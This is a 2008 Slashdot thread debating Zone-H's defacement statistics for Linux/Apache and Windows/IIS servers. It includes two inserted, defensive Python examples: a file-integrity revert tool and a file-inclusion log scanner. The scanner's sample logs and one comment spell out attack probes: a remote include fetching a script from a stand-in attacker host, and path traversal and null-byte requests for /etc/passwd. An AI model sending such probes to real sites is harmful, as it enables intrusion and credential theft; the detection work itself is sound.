Breakdowns of Website Defacement by Platform 203

SkiifGeek writes "Zone-H have recently posted the statistical breakdown of the collected website defacements from the last few years. Surprisingly, in 2007 more Linux servers suffered a successful attack than all versions of Windows, combined. Similarly, more Apache installations were successfully attacked than all IIS versions combined. A day after posting this data, Zone-H have questioned the appropriateness of continuing to operate the archive. Despite the valuable information that can be gleaned from the service, it may soon be lost to the world. The natural successor to the now-defunct Alldas archive of defaced websites, Zone-H's archive maintains records of over 2.6 million defaced sites but may be shut down due to the continuous accusations of impropriety leveled against them any time they disclose and mirror a reported defacement."
  • Websight?? (Score:5, Funny)

    by Rovastar ( 822365 ) on Saturday March 15, 2008 @09:56AM (#22759222)
    Even for slashdot that is terrible........
  • by gigne ( 990887 ) on Saturday March 15, 2008 @09:56AM (#22759228) Homepage Journal
    Websight? I hope that is in TFA, which due to tradition I did not read.
    • Websight? I hope that is in TFA, which due to tradition I did not read.

      You'd actually be doing the world a favor by defacing websight.com [websight.com] - it's another one of those "linkfest pages".

  • "Surprisingly"? (Score:5, Interesting)

    by Quietus ( 808995 ) on Saturday March 15, 2008 @09:58AM (#22759232)
    Given the proportion of Apache servers to IIS servers on the Internet, I don't think the ~280% difference is that strange. After all, most websites are vandalised through oversights in custom scripting etc., rather than security holes in Apache.
    • Re:"Surprisingly"? (Score:5, Insightful)

      by Rovastar ( 822365 ) on Saturday March 15, 2008 @10:08AM (#22759288)
      It is difficult to get accurate stats on this. Most will be stealing passwords, XSS, SQL injections, etc. So it does seem unfair and/or pointless to list by web server software or OS platform when that has little to do with the actual software you run on it. Dodgy admins and slack devs are to blame, not the technologies. For reference there have been no exploits at all in IIS 6.0, which comes with Windows 2003, whereas there have been a few with Apache.
      • by SL Baur ( 19540 )

        For reference there have been no exploits at all in IIS 6.0, which comes with Windows 2003

        Well, duh. As you and the other Microsoft Fanboys here like to point out to us when it comes to desktop attacks, you're not being targeted and we are. The Storm botnet was aimed at Linux/Apache servers and specifically avoided Microsoft Windows 2003 Server.

        And another quote from Microsoft Fanboys that I'll throw back at you, "you just don't have enough market share to care about."

        Not to defend sloppy admin practices, but I despise hypocrisy.

      • They count things like weak passwords as a "hack".

        This definitely has no relation to platform.

    • Re:"Surprisingly"? (Score:5, Informative)

      by call-me-kenneth ( 1249496 ) on Saturday March 15, 2008 @10:08AM (#22759296)
      Two factors. One, there are dozens and dozens of utterly lame hosting control panels, content management systems, messageboards and suchlike written in PHP. Secondly, IIS is far, far more secure than it was back in the bad old days. (And I speak as a fervent Apache supporter.)
      • by SL Baur ( 19540 )
        What's the frequency, Kenneth?

        You missed the point too. The supposedly ultra-powerful, ultra-huge, botnet that has consumed a vast portion of the internet, Storm, is specifically coded to not attack Microsoft Windows 2003 servers and only attacks Linux/Apache servers.

        And you were moderated +5 informative? Bah! I want my fair share of the crack everyone seems to be smoking.
        • by Goaway ( 82658 )
          And? What does "coded not to attack Microsoft Windows" mean to you, exactly?
    • Re: (Score:3, Insightful)

      by El Lobo ( 994537 )
      Hmm.. I thought here on Slashdot many people deny that there are more successful attacks on Windows just because it is the more popular platform. So now, in this case it **is** true that there are more successful attacks on Apache just because it is the more popular server. Well, come on people...
      • Re:"Surprisingly"? (Score:5, Insightful)

        by ozmanjusri ( 601766 ) <aussie_bob@hoMOSCOWtmail.com minus city> on Saturday March 15, 2008 @11:11AM (#22759564) Journal
        So now, in this case it **is** true that there are more successful attacks on Apache just because it is the more popular server. Well, come on people...

        It still makes sense because the bulk of successful attacks on webservers result from attack methods that are not platform specific (Attack against the administrator/user (password stealing/sniffing), Shares misconfiguration, File Inclusion, SQL Injection etc).

        The bulk of successful attacks against Windows, at least until very recently, have resulted from OS flaws.

        • by sco08y ( 615665 )
          The bulk of successful attacks against Windows, at least until very recently, have resulted from OS flaws.

          And now the bulk of attacks against Apache are due to admin misconfigurations. So while MS fixed the underlying problems, the Apache crew needs to improve the user interface for administration.

          There is commercial software that provides a GUI for Apache (hit your favorite search engine) and it ought to be a priority to bring such functionality into the core.
          • Re: (Score:3, Insightful)

            There is also the absolute lack of any security model in dozens if not hundreds of user-built add-on modules. Some of them are robust and well-tested (Webmin comes to mind). Others are hacked-up pieces of debris written by new users who just learned to spell PHP.
      • Re: (Score:3, Interesting)

        by cbart387 ( 1192883 )

        Hmm.. I thought here on Slashdot many people deny that there are more successful attacks on Windows just because it is the more popular platform.

        Not everyone. I'm not a fan of Windows, only because I find Linux more responsive and easier to use for my programming. I agree with you however that there is a double standard here. People who bash Windows (where it's not warranted) get modded insightful. However, when they try to defend Windows [slashdot.org] it's flamebait or troll. I'd go on a rant but I just wanted to say not everyone screams Windows security sucks yadda yadda yadda

      • by multisync ( 218450 ) on Saturday March 15, 2008 @11:22AM (#22759612) Journal
        I know. It's almost like there is more than one person posting on the bbs.
      • Re:"Surprisingly"? (Score:5, Insightful)

        by jsiren ( 886858 ) on Saturday March 15, 2008 @11:30AM (#22759646) Homepage
        Harrumph.

        A platform that is reasonably popular or otherwise interesting, and insecure by design, will be attacked. A more secure platform, which is also reasonably popular or otherwise interesting, will get attacked less.

        Now, looking at the attack method table, it's obvious that in a case of defacement, the underlying web server platform is largely irrelevant. Web sites these days are complex arrays of application logic and databases. Rarely does a large web site consist of a web server dealing out static files. This change enables more dynamic content and easier content administration than before; then again, it adds several places where things can go wrong. What the Zone-H statistic really tells is that in a complex setup where there are components that can be compromised, the front end web server is usually running Apache. This tells nothing about its security, since it's usually not the front end web server software that is compromised.

        Now, if the site included common web applications and application platforms in its reporting, the statistics would have much more value.
      • Re: (Score:3, Insightful)

        by camperdave ( 969942 )
        I thought here on Slashdot many people deny that there are more successful attacks on Windows just because it is the more popular platform.

        Of course windows gets attacked more because it is more popular. Nobody is denying that. However, it's not *JUST* because it is popular. It's the ratio of successful attacks to attempted attacks that people have a problem with. Windows has historically had a high ratio, meaning it was easy to crack into. Security holes used to remain open for months, or even years,
    • Numbers! (Score:5, Insightful)

      by TerranFury ( 726743 ) on Saturday March 15, 2008 @11:30AM (#22759644)

      The article says that there were 1,485,280 Apache defacements and 815,119 IIS defacements. This implies a total of 2,300,399 samples, of which 64.6% were Linux. For comparison, other posters here have cited a Google survey reporting that 60% of webservers run Apache. That would seem to imply that, if you pick an IIS server at random or an Apache server at random, each is about as likely to be successfully attacked as the other.

      Conclusion: IIS is just as good as Apache (contrary to popular Slashdot opinion). Of course, there's a flip side: Apache is just as good as IIS -- and it's free.

      [Take all this modulo the fact that 370% of statistics are, if not made up on the spot, at least full of so much noise as to be meaningless. (Sometimes the Law of Large Numbers really does require large numbers!)]

      • Also, a lot of people running Apache are newbs who don't know what they are doing, and using it just because it's free, or because it came with their ultra cheap hosting account. The page got defaced, not because of apache, but because they are noobs, and left SQL injection holes all over the place. How many of these defacements are due to bugs with Apache, as compared to defacements facilitated by people putting apps up on the web who didn't know what they were doing?
      • Probably the more important conclusion is that most web server exploits have nothing at all to do with which web server you are running. If the exploit is in your PHP app, then neither Apache nor IIS on Linux or Windows will protect you. The entire stack has to be secure for the platform to be secure. Holes in the operating system, web server, web app, or web app framework can all cause problems. Some of these can be mitigated, for example by running the web server in a chroot environment that it doesn'
    • Re: (Score:3, Informative)

      by 0kComputer ( 872064 )
      The author attributes this number to the fact that more people are switching from IIS to Apache. Check out the latest netcraft survey [netcraft.com], that doesn't seem to be the case. Over the last few years, IIS seems to be hanging on at around 35-40% market share and apache around 50-60%.
      • Re: (Score:3, Insightful)

        I kinda suspect that Apache is losing market share (is that even an appropriate term for a free product? anyway...) because some other open-source products are starting to mature. For example, while I still run Apache on my personal projects, I've switched to using Lighttpd at work because I got fed up with continuous config file syntax changes on every new release of Apache 2, and I tend to update the work servers a lot more often than my home server. So, if IIS is holding steady, and some of the other o
    • Given the proportion of Apache servers to IIS servers on the Internet, I don't think the ~280% difference is that strange. After all, most websites are vandalised through oversights in custom scripting etc., rather than security holes in Apache.

      I agree; how many of those were caused by a brain dead password in a web admin console or elsewhere?

      I mean, it's not really OS/software vulnerabilities behind most of these.

      That would have been surprising, and a true eye opener with web servers having years of development time and bug fixing behind them.

    • Given the proportion of Apache servers to IIS servers on the Internet, I don't think the ~280% difference is that strange. After all, most websites are vandalised through oversights in custom scripting etc., rather than security holes in Apache.

      By itself the figure is worthless. On the other hand stats indicating how the sites were compromised would be much more valuable.
      • by SL Baur ( 19540 )

        By itself the figure is worthless. On the other hand stats indicating how the sites were compromised would be much more valuable.
        Whew. I was beginning to think no one posting here had a clue. Sad though, that you haven't been moderated up yet.

        The most "popular" attack method recently has been the Storm botnet. It specifically *does not* target Microsoft Windows 2003 Server. It's very easy to get low numbers when you are not a popular target.
    • Uh, website defacement would require one of two things: Either really poor filesystem security (leaving the directory for your virtual site writable by whatever user Apache runs as), or a weak FTP password. Of course, that password could just as likely be scooped by someone listening on a nearby router or some other program that broke in through a broken php program. But for the most part, I've noticed that hackers these days are more interested in making money by spamming or phishing than they are in websi
    • The only valid statistics in this case will be "defacements per 1,000 servers active". Apache-using programmers are (apart from the brainwashing) no different from IIS-using programmers. They all make mistakes. Some of them just make those mistakes on a clearly superior platform.

      (The defensive linux fanboi will mod me troll for calling windows superior. The defensive windows fanboi will mod me troll for calling linux superior. The rational people will mod this redundant, 'cause I'm sure it's been said a tho
    • by SL Baur ( 19540 )

      Given the proportion of Apache servers to IIS servers on the Internet, I don't think the ~280% difference is that strange.

      Please take into account the fact that Storm botnet attack specifically avoided attacking Microsoft Windows 2003 Server. That was posted here, some time ago.

      How many of the Apache attacks came from Storm? Inquiring minds want to know!

      *All* of the numbers are quite small compared to what I would have expected given the reported number of members of the Storm botnet.

  • by sleeponthemic ( 1253494 ) on Saturday March 15, 2008 @09:59AM (#22759238) Homepage
    Actually mention proportions. Clever little summary, it was as if one million slashdot readers suddenly cried out in indignation... "I have to read the article? Nooo"
  • by JshWright ( 931399 ) on Saturday March 15, 2008 @10:02AM (#22759254) Homepage
    Perhaps I missed it in TFA, but I saw no weighting for market share...

    To pick an arbitrary statistic, in June 2007 Google reported Apache with a 66% market share and IIS with a 23% share (source [blogspot.com]). Given that the TFA lists "Attack against the administrator/user" as the most common attack method by a wide margin, and it seems to me that both Apache and IIS would be equally vulnerable to dumb administrators, wouldn't it make sense that the server with the larger market share would see more attacks?
    • by hey! ( 33014 ) on Saturday March 15, 2008 @10:16AM (#22759344) Homepage Journal
      Personally, I was alarmed by the rapid spike in website defacements on Windows 2003 during the period, which started at 72 thousand in 2005 and soared to 114 thousand in 2007. I'm sticking with Windows 2000, which started at 101 thousand in 2005 and dropped to under 24 thousand in 2007.

      If this trends continues, there will be negative fourteen thousand defacements of Windows 2000 this year -- that is to say fourteen thousand anti-defacements. Fourteen thousand webmasters hosting on Windows 2000 will find their sites say what they meant to say, despite their having actually said the wrong thing.

      It's like having an operating system that, instead of asking "where do you want to go today?" simply tells you where you ought to go.... Oh,wait.
    • To pick an arbitrary statistic, in June 2007 Google reported Apache with a 66% market share and IIS with a 23% share (source).

      And that's 66% overall. Now think what proportion of the sites containing homebrew or 'small scale'* open source blogs, wikis, content management systems, being managed by amateur/unpaid/hobbyist webmasters are likely to be running on the free Linux/Apache platform rather than paying money for IIS?

      both Apache and IIS would be equally vulnerable to dumb administrators

      ...and the sa

    • Re: (Score:3, Interesting)

      by lseltzer ( 311306 )
      The Google blog you cite essentially admits it's not as accurate as the Netcraft survey [netcraft.com], which shows the market shares much closer, i.e. about 51 to 36.

      But neither of them is really measuring market share; they're measuring share by domain, not server. So if you assume that one OS has more domains on it, on average, than the other, then its "market share" is proportionally less than the numbers in the survey. Personally, based on what I know about the hosting market, I would assume that Apache servers have
  • by G3ckoG33k ( 647276 ) on Saturday March 15, 2008 @10:03AM (#22759260)
    I wouldn't be surprised if most Linux servers were defaced because of poor configurations, by home users. How many have the needed skill to do it well and really secure? How many home users wish to pay for IIS? Probably not many.

    I guess IIS users on average are better at maintaining a server, as they probably are employed to do so.

    It would be interesting to see a "demographic" breakdown on defaced servers, how many corporate Linux servers have been defaced. I believe the numbers will be different.

    • I suspect that the number of websites running on home servers which also had a high enough profile to make it into the database when they were defaced, is quite small.

      Although I think administrators are to blame, I don't think it's a "home user" versus "professional" problem. (And seriously, do you really think there aren't tons of script kiddies running pirated copies of IIS? Just because you want to use it doesn't mean you have to pay for it.) I think a lot of the blame probably lies with crummy web-ba
      • Re: (Score:2, Informative)

        by EsJay ( 879629 )
        You don't pay extra for IIS or pirate it. It's included with Windows XP Professional and Vista (I don't know exactly which editions) as well as Windows Server.
    • I wouldn't be surprised if most Linux servers were defaced because of poor configurations, by home users.

      Home users running web servers?

      How many home users are paying for the static IP and business grade account that makes a server practical and not a violation of their TOS?

    • by imAck ( 102644 )
      Agreed that it would make sense to see the demographics. I would think that any small, home user's hobby website, the kind of which would be the most likely to be poorly configured, aren't going to be targets of website defacement.

      Of course, it's a vacuous argument, I have no data to support it.
    • by Krondor ( 306666 )
      I wouldn't be surprised if most Linux servers were defaced because of poor configurations, by home users. How many have the needed skill to do it well and really secure? How many home users wish to pay for IIS? Probably not many.

      Exactly, how many virtual host web server businesses offer IIS for their $5/month subscribers. I haven't seen any, it's all Apache and I can guarantee most of those people are amateurs. The web guided installs of things like phpMyAdmin, Drupal, etc... and the lack of knowledge mus
    • ``I guess IIS users on average are better at maintaining a server, as they probably are employed to do so.''

      Don't fool yourself into thinking that, since they are getting paid for it, they are better at it than people who aren't getting paid. Most people I've seen "maintaining IIS" maintained IIS because it had a GUI. That is, they could fire up the config tool and check boxes until stuff seemed to work.

      By contrast, most people I know who maintain Apache learn quite a bit about how HTTP works and how Apache
  • !Apache, but PHP (Score:5, Insightful)

    by Penguinisto ( 415985 ) on Saturday March 15, 2008 @10:03AM (#22759266) Journal
    Seriously... by this point, Apache can't do much more to stop someone from taking advantage of crap script and the underlying (and very likely unpatched) PHP running it.

    When the cure (more often than not these days) involves not having to disturb Apache at all (save for possibly changing something in httpd.conf), but instead fixing/dumping the bad script that let the baddies in, or patching PHP to plug the hole in it, then odds are good that it ain't Apache's fault, no?

    To be fair, it would also be like blaming IIS for crap XML or ASP script, and MSFT would certainly waste no time in saying so.

    /P

    • by Klaus_1250 ( 987230 ) on Saturday March 15, 2008 @10:22AM (#22759370)
      Have to agree. A substantial proportion of defacements are the results of security holes in scripting languages/scripts, with PHP leading the way. If you run a webserver, check your HTTP-security or Snort logs.
      • Re: (Score:3, Informative)

        by corsec67 ( 627446 )
        Agreed on the PHP being a huge problem.
        At my work, we see a bunch of attempts to exploit PHP every week, usually like this:

        http://www.example.com?var=http://www.1337h4x0r/script.php

        (we don't even use PHP, so this is probably coming from other hacked servers that are running php)

        The "feature" they are trying to exploit there is just crazy:
        If var in that case is used as a file name in a script load call, PHP will happily download the script from that website and run it instead of the local file that was ex

    • by loconet ( 415875 )
      Exactly. The article is misleading. If you look at the breakdown by methods of intrusion you will see that the great majority of top reasons are actually related to application bugs and misconfiguration rather than the web server itself. Very little can be done about that and the fact that Apache is the dominant web server only adds to the numbers:

      Attack against the administrator/user (password stealing/sniffing) 48.006 207.323 141.660
      Shares m
    Can't agree more. Bad PHP scripts are the core issue with most of the problems of this nature over the years, and now the author is using spurious logic to try and state that it is Apache and Linux's fault that people can't program PHP well.
  • by wwmedia ( 950346 ) on Saturday March 15, 2008 @10:05AM (#22759274)
    "98% of all statistics are made up"
    • Re: (Score:3, Funny)

      That's not true, a recent study has shown it was only 63% of all statistics.
      • Re: (Score:2, Funny)

        God damnit! It's not the statistics, it's the scripts running on calculators that people are getting the statistics from. Either that or noob calculator admins. Check your paper tape people! How many times do I have to say that? I keep my calculator in a safe (of course changing the combination to said safe 3 times a week), buried in a forest.
  • Are due to the 'programmer'/'sysadmin' not knowing wtf they are doing. SQL injection, Methods other than get/post, exposed admin pages, etc. This stuff, in my experience, is rarely a problem with the OS or web server itself, so these statistics are somewhat pointless.
  • Summary skewed. (Score:4, Interesting)

    by Lumpy ( 12016 ) on Saturday March 15, 2008 @10:09AM (#22759304) Homepage
    Of course Apache and linux have more attacks than windows.

    There are far more Honda Civics successfully stolen in the USA than BMW Isettas or Smart TwoFours. This is because there are well over 5000 Civics on the road for every BMW Isetta or Smart TwoFour on the road.

    By the summary's mention and what it is alluding to, BeOS servers are the most secure because NONE of them have been compromised on the internet.
    • Re: (Score:2, Insightful)

      by Shino ( 1136081 )
      Right, and left-handers live longer because statistically fewer left-handers die in a year than right-handers...
    • I hate to echo what someone else said earlier, but this is exactly the argument that's been put forward for years by Windows users as to why Windows is such a popular target for malware writers. That opinion has come up against some incredibly strong opposition from a good portion of the Slashdot crowd.

      Now that the shoe is on the other foot, so to speak, apparently having a larger marketshare is significant. I will find it very interesting to see who puts their hands up and admits that such exploits are mos
      • I can almost guarantee you, most web site exploits are exploits that involve the application, not the server.

        So yeah, OS-neutral. PHP is OS neutral and so is ASP. I've seen crappy applications written in each.
      • by spitzak ( 4019 )
        The problem is that in this case it is the *same* attacks on both platforms (mostly guessing or brute-forcing the password so that new pages can be uploaded). Thus the percentages on each platform almost exactly match the installed base percentages, in fact if they were different then the whole thing would be suspect.

        The same thing is becoming increasingly true for malware on desktop machines.

        The most common method of invading a machine is to fool the user into clicking on a download, and in this case I wou
    • by db32 ( 862117 )
      Funny how this is a one way argument. When MS users try to use this line of logic it gets torn to ribbons, when an OSS supporter uses the same it gets +5 Interesting
  • Was anybody else really confused for a second when they read the headline "Linux X Windows"? What does this article have to do with X-Windows? Then I realized they meant "versus".
  • by 3seas ( 184403 ) on Saturday March 15, 2008 @10:36AM (#22759436) Homepage Journal
    ...issue is more serious than it really needs to be?

    Using regular backup methods and unauthorized access alarms (access alarms that are either verified or not, as a matter of access notification loops).
    So when a site gets hacked there is timely notification and backup usage.

    In other words, should access happen but not get verification within a set amount of time, the site reverts back to its state before the unverified access.

    perhaps we can write this in PHP or python?
    • Yes, but your approach assumes that people are actually trying to make things secure. The problem is that they aren't.

      And frankly, I can't really blame them. When you are just getting started, or when you are under time pressure (often, one of these applies), you are happy enough once you get it to set up so that the happy flow works. Then you move on to other stuff.

      And let's face it: security is difficult. There are many factors you don't control, and you must guard against all possible attack vectors whil
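The alarm-and-revert scheme 3seas sketches above, as an added example (not code from the thread or from Zone-H). A baseline manifest of path to SHA-256 is taken from a known-good copy; each check cycle diffs the live web root against it and, unless the operator has verified a change (the hypothetical `approved_paths` argument stands in for that notification loop), restores the known-good copy and deletes anything the attacker added. The timing policy (how long to wait for verification before reverting) is left to whatever cron job or daemon calls `check_site`. The web root, backup copy and defacement in `demo()` are constructed in a temporary directory for this example.

```python
"""Added example, not code from the thread: baseline-manifest integrity check
with automatic revert of unverified changes (the scheme 3seas proposes).
"""
import hashlib
import os
import shutil
import tempfile


def manifest(root):
    """Map each regular file under root (relative path) to its SHA-256 hex digest."""
    out = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                out[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return out


def diff_manifests(baseline, current):
    """Classify differences between the known-good manifest and the live one."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
    }


def revert_unverified(webroot, backup, changes):
    """Undo every change listed: restore from the backup copy, delete files that were added."""
    actions = []
    for rel in changes["modified"] + changes["removed"]:
        dst = os.path.join(webroot, rel)
        os.makedirs(os.path.dirname(dst), exist_ok=True)
        shutil.copy2(os.path.join(backup, rel), dst)
        actions.append(("restored", rel))
    for rel in changes["added"]:
        os.remove(os.path.join(webroot, rel))
        actions.append(("deleted", rel))
    return actions


def check_site(webroot, backup, baseline, approved_paths=()):
    """One alarm cycle. approved_paths (hypothetical) is what the operator has verified
    as legitimate; everything else is reverted. Returns (all changes seen, actions taken)."""
    changes = diff_manifests(baseline, manifest(webroot))
    unverified = {k: [p for p in v if p not in approved_paths] for k, v in changes.items()}
    return changes, revert_unverified(webroot, backup, unverified)


def demo():
    """Constructed scenario: a defacer overwrites index.html and drops a PHP file."""
    tmp = tempfile.mkdtemp()
    try:
        webroot, backup = os.path.join(tmp, "htdocs"), os.path.join(tmp, "backup")
        os.makedirs(os.path.join(webroot, "img"))
        for rel, data in {"index.html": b"<h1>Welcome</h1>", "img/logo.png": b"\x89PNG..."}.items():
            with open(os.path.join(webroot, rel), "wb") as fh:
                fh.write(data)
        shutil.copytree(webroot, backup)      # the known-good copy
        baseline = manifest(webroot)

        with open(os.path.join(webroot, "index.html"), "wb") as fh:   # defacement
            fh.write(b"<h1>0wned</h1>")
        with open(os.path.join(webroot, "c99.php"), "wb") as fh:      # dropped file
            fh.write(b"<?php /* attacker-supplied */ ?>")

        changes, actions = check_site(webroot, backup, baseline)
        return changes, actions, manifest(webroot) == baseline
    finally:
        shutil.rmtree(tmp)


if __name__ == "__main__":
    changes, actions, clean = demo()
    print("changes:", changes)
    print("actions:", actions)
    print("web root matches baseline again:", clean)
```

Two caveats a practitioner would add before running this for real: the backup copy and the baseline manifest must live somewhere the web server's user cannot write, or the same weak FTP password that defaced the site will also "fix" the baseline; and content that legitimately changes (uploads, caches) needs to be excluded from the manifest or routed through `approved_paths`, otherwise the revert loop fights the application.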
  • Taking the posted ratio of 66% Apache (assuming all Linux, which I know is not true) to 23% IIS that means that:
    There are 2.869 times as many Apache installations as IIS. Windows is reported with 139,503 defacements. Linux is reported with 306,076 defacements.
    If we scale the Windows defacements by the ratio of Apache/IIS we get: Windows scaled: 400,313 (rounded up) defacements Linux (raw): 306,076 defacements
    Draw your own conclusions. (Realizing that this is flawed and meaningless.)
  • Interesting (Score:5, Insightful)

    by magamiako1 ( 1026318 ) on Saturday March 15, 2008 @11:58AM (#22759744)
    You know it comes across as interesting that whenever statistics come out that show that "Windows had more worms and viruses this year than Linux or MacOSX!" people use that as fuel to the fire to continually denounce Windows as a bad platform, Microsoft is the devil, Microsoft is evil, and any other number of ways of putting down Windows to make themselves feel better.

    Then a statistic that comes out that shows Linux/Apache at the top of a security vulnerability list, and it's immediately "Oh it's the users! They don't know how to implement the platform properly! It's the scripting language they used! These numbers are meaningless without marketshare values!"

    What we have as facts when it comes to security vulnerabilities:

    1. When more people use it, there is a tendency to have more security vulnerabilities since more eyes are scrutinizing what is or isn't possible with that platform.

    2. No matter which platform, it is only as secure as the person's implementation. If they don't know how to configure the system properly, it doesn't matter in the end.

    So why all the hate against Microsoft for their products if these same problems affect all platforms?
    • Re: (Score:3, Insightful)

      You know it comes across as interesting that whenever statistics come out that show that "Windows had more worms and viruses this year than Linux or MacOSX!" people use that as fuel to the fire to continually denounce Windows as a bad platform, Microsoft is the devil, Microsoft is evil, and any other number of ways of putting down Windows to make themselves feel better.

      Whose fault is it that Windows architecture suffers from viruses and worms. Microsoft and only Microsoft. Whose fault is it that an Apac

  • I have to kind of sit back and laugh, since the defense to Apache/Linux comes in the form of "bad scripting" or other holes created by poor admin skills.

    And I totally agree.

    Then why do we always sit here and blast Windows and Microsoft, when in fact good admins keep their boxes running with an optimal uptime, performance, etc? I will agree with the 95/98/ME era, but coming into XP and 2003 Server, I think that it comes down to the skill of the admin to eke out the performance out of the Windows boxes rather
  • by dindi ( 78034 ) on Saturday March 15, 2008 @12:43PM (#22759956)
    Well,
    When you allow larger flexibility of doing things, you open doors.

    PHP allows you to do ANYthing, including remote includes and relative and absolute includes (../whatever.php or /etc/passwd), while ASP is a pain in the back with these things ( include($variable) in ASP?? )

    What I am trying to say is that I am 90 percent sure most of the defacements came from badly written code, such as index.php?news=page.php, and the include($_GET[page]) kind of ignorant coding. Did I do that unthinkingly? OH yes. Everyone does, but then you learn.

    Same with linux. Many people I know have servers with ssh and FTP enabled with super safe passes:

    My favourite :
    Company name: Heartless Butchers LTD
    Login: Heartless
    pass: Butchers

    Also, I can write a script in 5 minutes that logs into remote systems and does this and that with scripting, but I am in trouble doing anything on a remote-access login to a GUI, which is hardly scriptable (OK, maybe that is my lack of knowledge of Wintel systems).

    Just my 2 cents: with flexibility you open doors, and I think that is where it all boils down in this case.
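The inclusion bug that both corsec67 (the `?var=http://www.1337h4x0r/script.php` probes in the logs) and dindi (`include($_GET[page])`) describe, as an added example that is not code from the thread. Two things are shown: the allowlist fix for a user-controlled include, written in Python on the assumption that a Python app with the same `?page=` design would have the same bug (the page names and template paths are hypothetical), and a scanner that flags inclusion payloads in Apache combined-format access log lines, which is the "check your logs" step Klaus_1250 and corsec67 mention. The log lines embedded below are constructed for the example, not taken from a real server.

```python
"""Added example, not code from the thread: allowlist fix for user-controlled
include plus a log scanner for remote/local file inclusion probes.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Fix: the value the user sends is a *name* looked up in a developer-chosen table.
# The raw value never becomes part of a path, so neither http:// nor ../ reaches include().
ALLOWED_PAGES = {               # hypothetical page table for the example
    "home": "pages/home.php",
    "news": "pages/news.php",
    "contact": "pages/contact.php",
}


def resolve_page(page_param, allowed=ALLOWED_PAGES):
    """Return the template for a ?page= value, or None when it is not allowlisted."""
    return allowed.get(page_param)


def classify_include_value(value):
    """Say why a query-string value looks like a file-inclusion payload; None if benign.

    `value` has already been URL-decoded once (parse_qsl does that); decoding a
    second time also catches double-encoded payloads such as %252e%252e.
    """
    v = unquote(value)
    if re.match(r"^[a-z][a-z0-9+.\-]*://", v, re.IGNORECASE):
        # http://, ftp://, and PHP stream wrappers such as php://input or data://
        return "url_or_stream_wrapper"
    if "\x00" in v:
        # "/etc/passwd%00" truncates an appended ".php" on old PHP builds
        return "null_byte_truncation"
    if ".." in v.replace("\\", "/").split("/"):
        return "path_traversal"
    if v.startswith("/"):
        return "absolute_path"
    return None


# Apache "combined" format: ip ident user [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) '
)


def scan_access_log(lines):
    """Return (ip, param, value, reason) for every request carrying an inclusion payload."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line or another log format: skip it, do not crash
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            reason = classify_include_value(value)
            if reason:
                hits.append((m.group("ip"), name, value, reason))
    return hits


# Constructed sample: one RFI probe, one benign request, one traversal,
# one null-byte variant, and one line that is not in combined format at all.
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Mar/2008:10:08:00 +0000] "GET /index.php?var=http://www.1337h4x0r/script.php HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '198.51.100.2 - - [15/Mar/2008:10:08:01 +0000] "GET /index.php?page=news HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [15/Mar/2008:10:08:02 +0000] "GET /index.php?page=../../../etc/passwd HTTP/1.1" 200 390 "-" "Mozilla/4.0"',
    '203.0.113.7 - - [15/Mar/2008:10:08:03 +0000] "GET /index.php?page=/etc/passwd%00 HTTP/1.1" 200 390 "-" "Mozilla/4.0"',
    "this line is not in combined format",
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print("%s %s=%r -> %s" % hit)
```

The scanner only tells you that someone tried; a 200 status on the probe line is not proof it worked, because `index.php` will happily return its normal page after a failed include. Whether the attempt succeeded is answered by `resolve_page`-style code on the application side (and, for PHP, by `allow_url_include` and `allow_url_fopen` being off), not by the log.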
  • M$ webservers are far more "Likely to be Defaced than L/FOSS websites"; so, SkiifGeek is M$Geek.

    If M$ webservers made up 54% of the market, then L/FOSS and M$-Win webservers would be proportionally equal in "Likelihood to be Defaced".

    However, it is far more likely that L/FOSS (Apache/Google...) webservers are about +60% of total webservers. This would indicate (I think) that M$ websites are about 60% (I suspect, two times more) "Likely to be Defaced than L/FOSS." IOW: Use M$ webservers at your own financial risk
  • Netcraft confirms it (Score:4, Interesting)

    by greg1104 ( 461138 ) <gsmith@gregsmith.com> on Saturday March 15, 2008 @02:00PM (#22760308) Homepage
    For once that's on topic. I started to rant like everybody else on how this was skewed by not taking into account the market share of Apache vs. IIS, but that's not the real story here.

    Take a look at the "Webserver defaced" table. It's badly formatted in a couple of respects. Here's a copy of the interesting data with defacement numbers sorted by server platform:

    nginx 729
    IIS (total) 447
    Apache 319
    Rapidsite 244
    SonataServer 178

    nginx doesn't run on Windows; I'd expect most sites deploying it would be on Linux or BSD. Rapidsite runs on a customized Apache, and again while I haven't found a definitive statement here I'd expect virtual hosting using Apache is going to be Linux or BSD as well. I'd welcome corrections here if I'm wrong about that.

    Combine this with the Netcraft data [netcraft.com] and the initial conclusion I would reach is that Linux+Apache is still the most secure platform. The only reason the Linux numbers are so inflated is that they include some really crappy web servers with significant vulnerabilities running something other than stock Apache.

    I wish I had the raw data so I could ask some more interesting questions, like how things change when you take the stupid user/admin data out. I don't care that it's possible to set a platform up wrong and get simple vulnerabilities, I only care about how vulnerable a good installation is.
  • Windows costs money. So in general, you can be pretty sure that a business is behind a Windows server, which means vested interest in keeping it alive, which means at least some level of investment in a somewhat competent administrator to manage them. Linux is free, so every server set up by some random kid, hobbyist, or idiot is not going to drop a grand on Server 2008. They're going to install what they find for free that has easy documentation on setup.
  • A number of people posting in this discussion have pointed out that Apache is used in technically different ways from IIS. A site with lots of complex middle components, PHP, etc. is more likely to use Apache for technical reasons. That shows that there can be a sort of apples to oranges comparison in looking at total statistics. Similarly, what about the possibility that sites who know that they are more likely to be a target for defacement will choose a web server or platform accordingly. Could it be
